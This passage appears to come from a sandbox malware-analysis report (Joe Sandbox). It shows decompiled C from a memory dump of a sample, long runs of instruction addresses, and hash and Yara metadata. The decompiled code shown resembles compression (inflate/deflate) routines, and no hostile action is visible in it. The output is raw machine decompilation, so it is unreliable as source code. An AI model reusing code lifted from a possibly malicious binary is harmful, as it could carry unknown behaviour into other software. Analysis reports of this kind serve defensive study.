                  							__eflags = _t1078;
                  							if(_t1078 == 0) {
                  								_t1119 = _v8;
                  								goto L327;
                  							}
                  							_t1079 = _t1078 - 9;
                  							__eflags = _t1079;
                  							if(_t1079 == 0) {
                  								goto L270;
                  							}
                  							_t1080 = _t1079 - 1;
                  							__eflags = _t1080;
                  							if(_t1080 == 0) {
                  								_t846 = _v44;
                  								goto L276;
                  							}
                  							__eflags = _t1080 == 1;
                  							if(_t1080 == 1) {
                  								goto L235;
                  							}
                  							goto L343;
                  						}
                  						if(__eflags == 0) {
                  							goto L296;
                  						}
                  						_t1082 = _t769 - 0x19;
                  						__eflags = _t1082;
                  						if(_t1082 == 0) {
                  							goto L201;
                  						}
                  						_t1083 = _t1082 - 1;
                  						__eflags = _t1083;
                  						if(_t1083 == 0) {
                  							goto L217;
                  						}
                  						_t1084 = _t1083 - 1;
                  						__eflags = _t1084;
                  						if(_t1084 == 0) {
                  							goto L226;
                  						}
                  						_t1085 = _t1084 - 5;
                  						__eflags = _t1085;
                  						if(_t1085 == 0) {
                  							goto L306;
                  						}
                  						_t1087 = _t1085;
                  						__eflags = _t1087;
                  						if(_t1087 == 0) {
                  							goto L333;
                  						}
                  						_t1088 = _t1087 - 1;
                  						__eflags = _t1088;
                  						if(_t1088 == 0) {
                  							goto L285;
                  						}
                  						__eflags = _t1088 != 1;
                  						if(_t1088 != 1) {
                  							goto L339;
                  						}
                  						L49:
                  						_v20 = _t1113;
                  						 *_t1350 = 0x24;
                  						goto L339;
                  					}
                  					if(_t1384 == 0) {
                  						_t873 = _v12;
                  						goto L194;
                  					}
                  					_t1385 = _t769 - 0xa;
                  					if(_t1385 > 0) {
                  						_t1090 = _t769 - 0xb;
                  						__eflags = _t1090;
                  						if(_t1090 == 0) {
                  							goto L81;
                  						}
                  						_t1091 = _t1090 - 3;
                  						__eflags = _t1091;
                  						if(_t1091 == 0) {
                  							goto L77;
                  						}
                  						_t1093 = _t1091;
                  						__eflags = _t1093;
                  						if(_t1093 == 0) {
                  							goto L132;
                  						}
                  						_t1094 = _t1093 - 1;
                  						__eflags = _t1094;
                  						if(_t1094 == 0) {
                  							goto L287;
                  						}
                  						_t1095 = _t1094 - 1;
                  						__eflags = _t1095;
                  						if(_t1095 == 0) {
                  							goto L143;
                  						}
                  						_t1096 = _t1095 - 3;
                  						__eflags = _t1096;
                  						if(_t1096 == 0) {
                  							goto L290;
                  						}
                  						__eflags = _t1096 == 0;
                  						if(_t1096 == 0) {
                  							goto L185;
                  						}
                  						goto L339;
                  					}
                  					if(_t1385 == 0) {
                  						goto L298;
                  					}
                  					if(_t769 > 9) {
                  						goto L343;
                  					}
                  					switch( *((intOrPtr*)(_t769 * 4 +  &M00405E60))) {
                  						case 0:
                  							_t1099 = _v28;
                  							_t1170 = _t1099;
                  							_t1350[3] = _t1099;
                  							_t1364 = _t1099;
                  							_t1350[2] = _t1099;
                  							_v56 = _t1099;
                  							_v12 = _t1099;
                  							_v44 = _t1099;
                  							_t1100 = _v24;
                  							_v8 = _t1170;
                  							_t1350[7] = _t1100;
                  							_t1350[4] = _t1100;
                  							if((_a20 & _t1100) == 0) {
                  								goto L66;
                  							}
                  							goto L12;
                  						case 1:
                  							L12:
                  							_t1281 = _v36;
                  							_t1101 = _t1288;
                  							if(_t1101 < _t1281) {
                  								_t1288 = _t1288 + 1;
                  								_t1350[2] =  *_t1101 & 0x000000ff;
                  								goto L16;
                  							}
                  							_t772 = _v24;
                  							 *_t1350 = _t772;
                  							goto L336;
                  						case 2:
                  							__ecx = _v36;
                  							L16:
                  							__eflags = _t1288 - _t1281;
                  							if(_t1288 < _t1281) {
                  								_t1103 =  *_t1288 & 0x000000ff;
                  								_t1282 = _t1350[2];
                  								_v28 = _t1103;
                  								_t1350[3] = _t1103;
                  								_t1106 = (_t1282 << 8) + _v28;
                  								_v16 = _t1288 + 1;
                  								_v40 = 0x1f;
                  								__eflags = _t1106 % _v40;
                  								if(_t1106 % _v40 != 0) {
                  									L23:
                  									_t1348 = _v24;
                  									_t1108 = _t1348;
                  									L24:
                  									__eflags = _v52;
                  									_v12 = _t1108;
                  									if(_v52 != 0) {
                  										L30:
                  										_t1288 = _v16;
                  										__eflags = _t1108;
                  										if(_t1108 != 0) {
                  											goto L49;
                  										}
                  										goto L63;
                  									}
                  									_t1349 = _t1348 << (_t1282 >> 4) + 8;
                  									__eflags = _t1349 - 0x8000;
                  									if(_t1349 > 0x8000) {
                  										L28:
                  										_t1285 = _v24;
                  										L29:
                  										_t1108 = _t1108 | _t1285;
                  										__eflags = _t1108;
                  										_v12 = _t1108;
                  										goto L30;
                  									}
                  									_push(0xffffffff);
                  									_pop(_t1113);
                  									__eflags = _v68 + 1 - _t1349;
                  									if(_v68 + 1 < _t1349) {
                  										goto L28;
                  									}
                  									_t1285 = 0;
                  									goto L29;
                  								}
                  								__eflags = _v28 & 0x00000020;
                  								if((_v28 & 0x00000020) != 0) {
                  									goto L23;
                  								}
                  								__eflags = (_t1282 & 0x0000000f) - 8;
                  								if((_t1282 & 0x0000000f) != 8) {
                  									goto L23;
                  								}
                  								_t1348 = _v24;
                  								_t1108 = 0;
                  								goto L24;
                  							}
                  							_push(2);
                  							_pop(_t1111);
                  							__eflags = _a20 & _t1111;
                  							_push(0xfffffffc);
                  							_pop(_t1131);
                  							_t1113 =  !=  ? _v24 : _t1131;
                  							 *_t1350 = _t1111;
                  							goto L18;
                  						case 3:
                  							goto L64;
                  						case 4:
                  							goto L339;
                  						case 5:
                  							goto L251;
                  						case 6:
                  							goto L258;
                  						case 7:
                  							goto L262;
                  						case 8:
                  							__ecx = _v32;
                  							goto L279;
                  					}
                  				}
                  			}

                  0x00405a45
                  0x00405a48
                  0x00405b7b
                  0x00405b7c
                  0x00405b7f
                  0x00000000
                  0x00405b7f
                  0x00405a4e
                  0x00405a50
                  0x00405a54
                  0x00405a55
                  0x00405a58
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405a02
                  0x00405a02
                  0x00405a02
                  0x00405a05
                  0x00000000
                  0x00000000
                  0x00405a10
                  0x00405a12
                  0x00405a16
                  0x00405a19
                  0x00405a1b
                  0x00405a1e
                  0x00405a21
                  0x00405a24
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405a26
                  0x00405b6e
                  0x00000000
                  0x00405b6e
                  0x00405951
                  0x00405953
                  0x00405994
                  0x00405994
                  0x00405997
                  0x00405b63
                  0x00000000
                  0x00405b63
                  0x0040599d
                  0x0040599f
                  0x0040599f
                  0x004059a0
                  0x004059a7
                  0x004059aa
                  0x004059ad
                  0x004059ad
                  0x00000000
                  0x004059ad
                  0x00405955
                  0x00405958
                  0x0040597f
                  0x0040597f
                  0x00405986
                  0x00405989
                  0x0040598c
                  0x0040598f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040595a
                  0x0040595a
                  0x0040595a
                  0x0040595d
                  0x00000000
                  0x00000000
                  0x00405968
                  0x0040596a
                  0x0040596b
                  0x0040596e
                  0x00405971
                  0x00405974
                  0x00405977
                  0x00000000
                  0x00000000
                  0x00405979
                  0x0040597c
                  0x00000000
                  0x0040597c
                  0x00405b58
                  0x00000000
                  0x00405b58
                  0x00404df6
                  0x00404df9
                  0x00405b3f
                  0x00405b3f
                  0x00405b42
                  0x00000000
                  0x00405b42
                  0x00404dff
                  0x00404e02
                  0x00404e68
                  0x00404e68
                  0x00404e6a
                  0x00404e6a
                  0x00404e6d
                  0x00404e70
                  0x00404f0d
                  0x00404f0d
                  0x00404f0d
                  0x00404f14
                  0x00404f17
                  0x00404f19
                  0x00404ef0
                  0x00404ef0
                  0x00404ef3
                  0x00405a87
                  0x00000000
                  0x00405a87
                  0x00404efe
                  0x00404f00
                  0x00404f01
                  0x00404f04
                  0x00404f04
                  0x00404f07
                  0x00404f0a
                  0x00000000
                  0x00404f0a
                  0x00404f1e
                  0x00404f2a
                  0x00404f30
                  0x00404f30
                  0x00404f37
                  0x00404f3a
                  0x00404f3c
                  0x00404f3e
                  0x00404f48
                  0x00404f4b
                  0x00404f4c
                  0x00000000
                  0x00404f4c
                  0x00404e84
                  0x00404e8a
                  0x00404e8d
                  0x00404e90
                  0x00404e90
                  0x00404e92
                  0x00404e92
                  0x00404e95
                  0x00404e98
                  0x00404f54
                  0x00404f5b
                  0x00404f5b
                  0x00404f5e
                  0x00404f60
                  0x004053a3
                  0x004053a3
                  0x004053a6
                  0x004053a9
                  0x004053ab
                  0x004053ae
                  0x004054e3
                  0x004054e3
                  0x004054e6
                  0x00405513
                  0x00405513
                  0x00405516
                  0x0040551d
                  0x00405525
                  0x00405528
                  0x0040552a
                  0x004055d7
                  0x004055d8
                  0x004055db
                  0x004055e3
                  0x004055e6
                  0x004055e7
                  0x004055ef
                  0x004055f2
                  0x004055f2
                  0x004055f6
                  0x004055f6
                  0x004055f9
                  0x004055fb
                  0x00405600
                  0x00405621
                  0x00405621
                  0x00405626
                  0x00405629
                  0x0040562e
                  0x00000000
                  0x00000000
                  0x00405634
                  0x0040563b
                  0x00405647
                  0x0040564a
                  0x0040564d
                  0x0040564f
                  0x00405685
                  0x00405685
                  0x00405688
                  0x004056ba
                  0x004056ba
                  0x004056bd
                  0x004056c4
                  0x004056cc
                  0x004056cf
                  0x004056d1
                  0x00405779
                  0x0040577c
                  0x00405781
                  0x00405782
                  0x0040578b
                  0x0040578d
                  0x0040578e
                  0x00405796
                  0x00405796
                  0x0040579a
                  0x0040579d
                  0x004057a0
                  0x004057a0
                  0x004057a3
                  0x004057a6
                  0x004057a6
                  0x004057a9
                  0x004057ab
                  0x004057b2
                  0x004057b9
                  0x004057bc
                  0x004057bf
                  0x004057c1
                  0x004057fa
                  0x004057fd
                  0x00405800
                  0x00405803
                  0x00405805
                  0x00405811
                  0x00405811
                  0x00405819
                  0x0040581c
                  0x00405821
                  0x00405825
                  0x00405828
                  0x0040582b
                  0x00405869
                  0x0040586c
                  0x0040586f
                  0x004058d2
                  0x004058d2
                  0x004058d5
                  0x004058d5
                  0x004058d7
                  0x004058da
                  0x004058df
                  0x004058e5
                  0x004058e8
                  0x004058ee
                  0x004058f1
                  0x004058f4
                  0x004058f4
                  0x004058f9
                  0x004058fc
                  0x004058fe
                  0x00000000
                  0x00000000
                  0x00405906
                  0x00405908
                  0x0040590b
                  0x0040590e
                  0x004058c8
                  0x004058ca
                  0x00000000
                  0x004058ca
                  0x004058bf
                  0x004058c2
                  0x004058c5
                  0x00000000
                  0x004058c5
                  0x00405871
                  0x00405874
                  0x00000000
                  0x00000000
                  0x00405876
                  0x0040587e
                  0x0040587e
                  0x00405880
                  0x00405882
                  0x00405884
                  0x00405887
                  0x0040588a
                  0x0040588d
                  0x00405890
                  0x00405890
                  0x00405897
                  0x0040589a
                  0x0040589d
                  0x004058a0
                  0x004058a3
                  0x004058a6
                  0x00000000
                  0x00000000
                  0x004058a8
                  0x004058aa
                  0x00000000
                  0x00000000
                  0x004058b0
                  0x004058b5
                  0x004058b7
                  0x004058ba
                  0x004058bd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004058bd
                  0x0040582d
                  0x00405830
                  0x00405830
                  0x00405832
                  0x00405833
                  0x00405836
                  0x00405838
                  0x00000000
                  0x00000000
                  0x0040583e
                  0x00405841
                  0x00405844
                  0x00405b30
                  0x00405b31
                  0x00405b34
                  0x00000000
                  0x00405b34
                  0x0040585c
                  0x0040585f
                  0x00405862
                  0x00405864
                  0x00000000
                  0x00405864
                  0x00405807
                  0x0040580b
                  0x00405b20
                  0x00405b20
                  0x00405b23
                  0x00000000
                  0x00405b23
                  0x00000000
                  0x0040580b
                  0x004057e2
                  0x004057e2
                  0x004057e4
                  0x004057c5
                  0x004057c5
                  0x004057c8
                  0x00405b15
                  0x00000000
                  0x00405b15
                  0x004057d3
                  0x004057d5
                  0x004057d6
                  0x004057d9
                  0x004057d9
                  0x004057dc
                  0x004057df
                  0x00000000
                  0x004057df
                  0x004057e9
                  0x004057f1
                  0x004057f4
                  0x004057f4
                  0x004057f4
                  0x004057f7
                  0x00000000
                  0x004057f7
                  0x004056d9
                  0x004056dc
                  0x00000000
                  0x004056dc
                  0x0040568f
                  0x00405692
                  0x0040574b
                  0x00405763
                  0x00405768
                  0x0040576b
                  0x0040576e
                  0x00405771
                  0x00000000
                  0x00405771
                  0x00405698
                  0x004056a0
                  0x004056a8
                  0x004056ab
                  0x004056ad
                  0x004056e6
                  0x004056e9
                  0x0040571e
                  0x0040571e
                  0x00405721
                  0x00405b0a
                  0x00000000
                  0x00405b0a
                  0x0040572c
                  0x0040572e
                  0x00405732
                  0x00405735
                  0x00405737
                  0x0040573a
                  0x0040573d
                  0x00405740
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405746
                  0x004056ed
                  0x004056ee
                  0x004056f1
                  0x00405700
                  0x0040570b
                  0x0040570c
                  0x0040570f
                  0x00405712
                  0x00405714
                  0x00000000
                  0x00000000
                  0x00405716
                  0x0040571a
                  0x0040571c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040571c
                  0x00000000
                  0x004056f1
                  0x004056af
                  0x004056b2
                  0x004056b4
                  0x00000000
                  0x00000000
                  0x004056b6
                  0x004056b8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004056b8
                  0x00405670
                  0x00405670
                  0x00405672
                  0x00405653
                  0x00405653
                  0x00405656
                  0x00405aff
                  0x00000000
                  0x00405aff
                  0x00405661
                  0x00405663
                  0x00405664
                  0x00405667
                  0x00405667
                  0x0040566a
                  0x0040566d
                  0x00000000
                  0x0040566d
                  0x00405677
                  0x0040567f
                  0x00405682
                  0x00405682
                  0x00405682
                  0x00000000
                  0x00405682
                  0x00405607
                  0x00405607
                  0x0040560a
                  0x0040560d
                  0x00405af0
                  0x00405af1
                  0x00405af4
                  0x00000000
                  0x00405af4
                  0x00405613
                  0x00405615
                  0x00405615
                  0x00405616
                  0x00405616
                  0x00000000
                  0x00405616
                  0x00405532
                  0x00405535
                  0x0040553a
                  0x00000000
                  0x0040553a
                  0x004054e8
                  0x004054eb
                  0x004055bf
                  0x004055c4
                  0x004055c7
                  0x004055ca
                  0x004055cd
                  0x00000000
                  0x004055cd
                  0x004054f1
                  0x004054f9
                  0x00405501
                  0x00405504
                  0x00405506
                  0x00405542
                  0x00405545
                  0x0040557a
                  0x0040557a
                  0x0040557d
                  0x00405ae3
                  0x00000000
                  0x00405ae3
                  0x00405588
                  0x0040558a
                  0x0040558e
                  0x00405591
                  0x00405593
                  0x00405596
                  0x00405599
                  0x0040559c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004055a2
                  0x00405549
                  0x0040554a
                  0x0040554d
                  0x0040555c
                  0x00405567
                  0x00405568
                  0x0040556b
                  0x0040556e
                  0x00405570
                  0x00000000
                  0x00000000
                  0x00405572
                  0x00405576
                  0x00405578
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405578
                  0x00000000
                  0x0040554d
                  0x00405508
                  0x0040550b
                  0x0040550d
                  0x00000000
                  0x00000000
                  0x0040550f
                  0x00405511
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405511
                  0x004053bc
                  0x004053bd
                  0x004053c0
                  0x00000000
                  0x00000000
                  0x004053c6
                  0x004053c9
                  0x004053f4
                  0x004053cb
                  0x004053e1
                  0x004053e6
                  0x004053e9
                  0x004053ec
                  0x004053ef
                  0x004053ef
                  0x004053fc
                  0x00405404
                  0x00405407
                  0x00405409
                  0x00405414
                  0x00405415
                  0x00405418
                  0x00405420
                  0x00405423
                  0x00405424
                  0x0040542c
                  0x0040542f
                  0x0040542f
                  0x00000000
                  0x0040540b
                  0x0040540d
                  0x00405433
                  0x00405433
                  0x00405436
                  0x00405438
                  0x0040543d
                  0x00000000
                  0x00000000
                  0x00405443
                  0x00405446
                  0x00405471
                  0x00405448
                  0x0040545e
                  0x00405463
                  0x00405466
                  0x00405469
                  0x0040546c
                  0x0040546c
                  0x00405479
                  0x00405481
                  0x00405484
                  0x00405486
                  0x00405491
                  0x00405492
                  0x00405495
                  0x004054a2
                  0x004054a7
                  0x004054a8
                  0x004054ab
                  0x004054b3
                  0x004054b6
                  0x004054b6
                  0x00000000
                  0x00405488
                  0x0040548a
                  0x004054ba
                  0x004054bd
                  0x004054bf
                  0x004054c7
                  0x004054c9
                  0x004054ca
                  0x004054cf
                  0x0040561e
                  0x0040561e
                  0x0040561e
                  0x00000000
                  0x0040561e
                  0x004054d5
                  0x004054d8
                  0x004054db
                  0x00000000
                  0x004054db
                  0x00405486
                  0x00405409
                  0x00404f75
                  0x00404f7f
                  0x00404f95
                  0x00404fab
                  0x00404fb1
                  0x00404fb4
                  0x00404fb6
                  0x00404fb9
                  0x00404fbd
                  0x00404fd7
                  0x00404fd7
                  0x00404fdb
                  0x00404fdd
                  0x00404fe3
                  0x00404fe3
                  0x00404fe3
                  0x00404feb
                  0x00404fec
                  0x00404fec
                  0x00404ff5
                  0x00404ff8
                  0x00404ffa
                  0x00405001
                  0x00405004
                  0x00405004
                  0x00405009
                  0x0040500f
                  0x0040501d
                  0x0040501d
                  0x00405020
                  0x00405024
                  0x00405027
                  0x0040502c
                  0x0040516a
                  0x0040516a
                  0x0040516e
                  0x0040539b
                  0x0040539b
                  0x00000000
                  0x0040539b
                  0x00405174
                  0x00405174
                  0x00405176
                  0x0040517c
                  0x0040517f
                  0x00405181
                  0x00405361
                  0x00405363
                  0x00405ad2
                  0x00405ad5
                  0x00405ad5
                  0x00405ad8
                  0x00000000
                  0x00405ad8
                  0x00405377
                  0x00405388
                  0x00405388
                  0x00405392
                  0x00405398
                  0x00000000
                  0x00405398
                  0x00405187
                  0x0040518a
                  0x0040518d
                  0x004051bf
                  0x004051bf
                  0x004051c2
                  0x004051c9
                  0x004051d1
                  0x004051d4
                  0x004051d6
                  0x00405283
                  0x00405284
                  0x00405287
                  0x0040528f
                  0x00405292
                  0x00405293
                  0x0040529b
                  0x0040529e
                  0x0040529e
                  0x004052a2
                  0x004052a5
                  0x004052a7
                  0x004052a9
                  0x004052ac
                  0x004052af
                  0x004052b2
                  0x004052b5
                  0x004052ca
                  0x004052d6
                  0x004052d6
                  0x004052dd
                  0x004052e0
                  0x004052e2
                  0x00405308
                  0x0040530b
                  0x00405310
                  0x00405317
                  0x0040531a
                  0x0040531d
                  0x00405324
                  0x00405326
                  0x00405329
                  0x0040532c
                  0x0040532f
                  0x0040533b
                  0x0040533b
                  0x00405331
                  0x00405331
                  0x00405331
                  0x00405347
                  0x00405350
                  0x00405353
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004052e4
                  0x004052e4
                  0x004052e4
                  0x004052e7
                  0x00000000
                  0x00000000
                  0x004052f2
                  0x004052f4
                  0x004052f5
                  0x004052f8
                  0x004052fb
                  0x004052fe
                  0x00405301
                  0x00405303
                  0x00000000
                  0x00000000
                  0x00405305
                  0x00000000
                  0x00405305
                  0x00405ac7
                  0x00000000
                  0x00405ac7
                  0x004052cc
                  0x004052d0
                  0x00405ab9
                  0x00405ab9
                  0x00405abc
                  0x00000000
                  0x00405abc
                  0x00000000
                  0x004052d0
                  0x004052b7
                  0x004052bd
                  0x004052c4
                  0x00000000
                  0x004052c4
                  0x004051de
                  0x004051e6
                  0x00000000
                  0x004051e6
                  0x00405194
                  0x00405197
                  0x0040526b
                  0x00405270
                  0x00405273
                  0x00405276
                  0x00405279
                  0x00000000
                  0x00405279
                  0x0040519d
                  0x004051a5
                  0x004051ad
                  0x004051b0
                  0x004051b2
                  0x004051ee
                  0x004051f1
                  0x00405226
                  0x00405226
                  0x00405229
                  0x00405aae
                  0x00000000
                  0x00405aae
                  0x00405234
                  0x00405236
                  0x0040523a
                  0x0040523d
                  0x0040523f
                  0x00405242
                  0x00405245
                  0x00405248
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040524e
                  0x004051f5
                  0x004051f6
                  0x004051f9
                  0x00405208
                  0x00405213
                  0x00405214
                  0x00405217
                  0x0040521a
                  0x0040521c
                  0x00000000
                  0x00000000
                  0x0040521e
                  0x00405222
                  0x00405224
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405224
                  0x00000000
                  0x004051f9
                  0x004051b4
                  0x004051b7
                  0x004051b9
                  0x00000000
                  0x00000000
                  0x004051bb
                  0x004051bd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004051bd
                  0x00405032
                  0x00405035
                  0x00405038
                  0x0040503a
                  0x0040503e
                  0x00405041
                  0x00405043
                  0x00000000
                  0x00000000
                  0x00405049
                  0x00405050
                  0x00405056
                  0x0040505d
                  0x00405067
                  0x00405069
                  0x0040506b
                  0x0040506c
                  0x0040506f
                  0x0040506f
                  0x00405073
                  0x00405076
                  0x00405079
                  0x004050c6
                  0x004050cb
                  0x004050d3
                  0x004050d6
                  0x004050d8
                  0x004050dd
                  0x004050e0
                  0x004050e3
                  0x004050eb
                  0x004050eb
                  0x004050ee
                  0x004050f1
                  0x004050f1
                  0x004050f4
                  0x004050f7
                  0x004050fa
                  0x00405143
                  0x0040514b
                  0x0040514b
                  0x0040514e
                  0x00000000
                  0x004050fc
                  0x004050fc
                  0x004050ff
                  0x004050ff
                  0x00405102
                  0x00405105
                  0x00405105
                  0x00405112
                  0x00405117
                  0x0040511b
                  0x0040511e
                  0x00405137
                  0x00405120
                  0x00405123
                  0x00405126
                  0x0040512c
                  0x00405132
                  0x00405132
                  0x0040513a
                  0x0040513a
                  0x0040513a
                  0x0040513d
                  0x00405140
                  0x00000000
                  0x00405140
                  0x004050fa
                  0x00405085
                  0x00405088
                  0x0040508e
                  0x00000000
                  0x00000000
                  0x0040509a
                  0x0040509d
                  0x004050a2
                  0x004050a2
                  0x004050a7
                  0x004050aa
                  0x004050aa
                  0x004050ad
                  0x004050af
                  0x004050b1
                  0x004050b1
                  0x004050b9
                  0x00405156
                  0x00405156
                  0x00405159
                  0x0040515a
                  0x0040515a
                  0x00405164
                  0x00405167
                  0x00405167
                  0x00000000
                  0x00405167
                  0x00405014
                  0x00405017
                  0x00405a9d
                  0x00405aa0
                  0x00405aa0
                  0x00405aa3
                  0x00000000
                  0x00405aa3
                  0x00000000
                  0x00405017
                  0x00404fbf
                  0x00404fc2
                  0x00404fc6
                  0x00404fcd

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$_memset
                  • String ID: $0HCw
                  • API String ID: 805054810-431550929
                  • Opcode ID: 381c95585b6278ef5375f448f3179df0e1c7a5d05708aec7cc4d4f43877259da
                  • Instruction ID: 0f27d5521e96fbc1980188426f25ed571c9babf91149ddb257576a03cfef0b11
                  • Opcode Fuzzy Hash: 381c95585b6278ef5375f448f3179df0e1c7a5d05708aec7cc4d4f43877259da
                  • Instruction Fuzzy Hash: 59D25D71E0461ADBDB18CFA9C9906AEBBB1FF49300F14416AD955F7380D738AA41CF98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 88%
                  			E00402F82(void* __ecx) {
                  				int _v8;
                  				int _v12;
                  				signed int _v16;
                  				signed char _v20;
                  				signed char _v24;
                  				int _v28;
                  				int _v32;
                  				intOrPtr _v36;
                  				char _v356;
                  				void _v676;
                  				int _t269;
                  				signed char _t283;
                  				signed char _t287;
                  				signed char _t291;
                  				signed int _t294;
                  				signed char _t297;
                  				signed int _t298;
                  				signed char _t301;
                  				signed char _t310;
                  				int _t336;
                  				int _t337;
                  				signed char _t341;
                  				signed char _t342;
                  				signed char _t343;
                  				void* _t344;
                  				void* _t345;
                  				signed char _t346;
                  				signed char _t347;
                  				signed char _t348;
                  				signed char* _t349;
                  				signed char* _t350;
                  				signed char _t351;
                  				signed char* _t352;
                  				signed char* _t353;
                  				signed char* _t354;
                  				signed char* _t355;
                  				signed char* _t356;
                  				intOrPtr _t358;
                  				intOrPtr _t360;
                  				char _t361;
                  				intOrPtr _t362;
                  				char _t364;
                  				intOrPtr _t366;
                  				intOrPtr _t368;
                  				void* _t374;
                  				void* _t375;
                  				signed int _t377;
                  				signed char _t379;
                  				int _t381;
                  				void* _t383;
                  				signed int _t385;
                  				void* _t387;
                  				void* _t388;
                  				signed int _t389;
                  				void* _t390;
                  				void* _t391;
                  				void* _t392;
                  				void* _t393;
                  
                  				_v20 = 0xff;
                  				_t383 = __ecx;
                  				 *((short*)(__ecx + 0x8392)) = 1;
                  				E00402D85(__ecx, 0, 0x120, 0xf, 0);
                  				E00402D85(__ecx, 1, 0x20, 0xf, 0);
                  				_t392 = _t391 + 0x18;
                  				_t336 = 0x11e;
                  				while( *((char*)(_t383 + _t336 + 0x8f11)) == 0) {
                  					_t336 = _t336 - 1;
                  					if(_t336 > 0x101) {
                  						continue;
                  					}
                  					break;
                  				}
                  				_v16 = _t336;
                  				_t269 = 0x1e;
                  				while( *((char*)(_t383 + _t269 + 0x9031)) == 0) {
                  					_t269 = _t269 - 1;
                  					if(_t269 > 1) {
                  						continue;
                  					}
                  					break;
                  				}
                  				_v32 = _t269;
                  				memcpy( &_v676, _t383 + 0x8f12, _t336);
                  				memcpy( &_v676 + _t336, _t383 + 0x9032, _v32);
                  				_t337 = 0;
                  				_v36 = _v32 + _t336;
                  				_v12 = 0;
                  				_v8 = 0;
                  				memset(_t383 + 0x8612, 0, 0x26);
                  				_t393 = _t392 + 0x24;
                  				_v28 = 0;
                  				if(_v36 > 0) {
                  					_t310 = _v20;
                  					do {
                  						_t379 =  *((intOrPtr*)(_t390 + _v28 - 0x2a0));
                  						_v24 = _t379;
                  						if(_t379 != 0) {
                  							_t358 = _v12;
                  							if(_t358 != 0) {
                  								if(_t358 >= 3) {
                  									if(_t358 > 0xa) {
                  										 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
                  										_t364 = _t358 - 0xb;
                  										 *(_t390 + _t337 - 0x160) = 0x12;
                  									} else {
                  										 *((short*)(_t383 + 0x8634)) =  *((short*)(_t383 + 0x8634)) + 1;
                  										_t364 = _t358 - 3;
                  										 *(_t390 + _t337 - 0x160) = 0x11;
                  									}
                  									 *((char*)(_t390 + _t337 - 0x15f)) = _t364;
                  									_t337 = _t337 + 2;
                  								} else {
                  									 *(_t383 + 0x8612) =  *(_t383 + 0x8612) + _t358;
                  									E0040FDD0( &_v356 + _t337, 0, _t358);
                  									_t393 = _t393 + 0xc;
                  									_t379 = _v24;
                  									_t337 = _t337 + _v12;
                  								}
                  								_t310 = _v20;
                  								_v12 = 0;
                  							}
                  							if(_t379 == _t310) {
                  								_t381 = _v8 + 1;
                  								_v8 = _t381;
                  								if(_t381 == 6) {
                  									 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
                  									_t381 = 0;
                  									 *(_t390 + _t337 - 0x160) = 0x310;
                  									_v8 = 0;
                  									goto L33;
                  								}
                  							} else {
                  								_t362 = _v8;
                  								if(_t362 != 0) {
                  									if(_t362 >= 3) {
                  										 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
                  										 *(_t390 + _t337 - 0x160) = 0x10;
                  										 *((char*)(_t390 + _t337 - 0x15f)) = _t362 - 3;
                  										_t337 = _t337 + 2;
                  									} else {
                  										 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t362;
                  										E0040FDD0( &_v356 + _t337, _v20, _t362);
                  										_t379 = _v24;
                  										_t393 = _t393 + 0xc;
                  										_t337 = _t337 + _v8;
                  									}
                  									_v8 = 0;
                  								}
                  								 *(_t390 + _t337 - 0x160) = _t379;
                  								_t381 = _v8;
                  								 *((short*)(_t383 + 0x8612 + (_t379 & 0x000000ff) * 2)) =  *((short*)(_t383 + 0x8612 + (_t379 & 0x000000ff) * 2)) + 1;
                  								_t337 = _t337 + 1;
                  							}
                  						} else {
                  							_t366 = _v8;
                  							if(_t366 != 0) {
                  								if(_t366 >= 3) {
                  									 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
                  									 *(_t390 + _t337 - 0x160) = 0x10;
                  									 *((char*)(_t390 + _t337 - 0x15f)) = _t366 - 3;
                  									_t337 = _t337 + 2;
                  								} else {
                  									 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t366;
                  									E0040FDD0( &_v356 + _t337, _v20, _t366);
                  									_t393 = _t393 + 0xc;
                  									_t337 = _t337 + _v8;
                  								}
                  								_v8 = 0;
                  							}
                  							_t381 = _v8;
                  							_t368 = _v12 + 1;
                  							_v12 = _t368;
                  							if(_t368 == 0x8a) {
                  								 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
                  								 *(_t390 + _t337 - 0x160) = 0x7f12;
                  								_v12 = 0;
                  								L33:
                  								_t337 = _t337 + 2;
                  							}
                  						}
                  						_v28 = _v28 + 1;
                  						_t310 = _v24;
                  						_t360 = _v12;
                  						_v20 = _t310;
                  					} while (_v28 < _v36);
                  					if(_t381 == 0) {
                  						if(_t360 != 0) {
                  							if(_t360 >= 3) {
                  								if(_t360 > 0xa) {
                  									 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
                  									_t361 = _t360 - 0xb;
                  									 *(_t390 + _t337 - 0x160) = 0x12;
                  								} else {
                  									 *((short*)(_t383 + 0x8634)) =  *((short*)(_t383 + 0x8634)) + 1;
                  									_t361 = _t360 - 3;
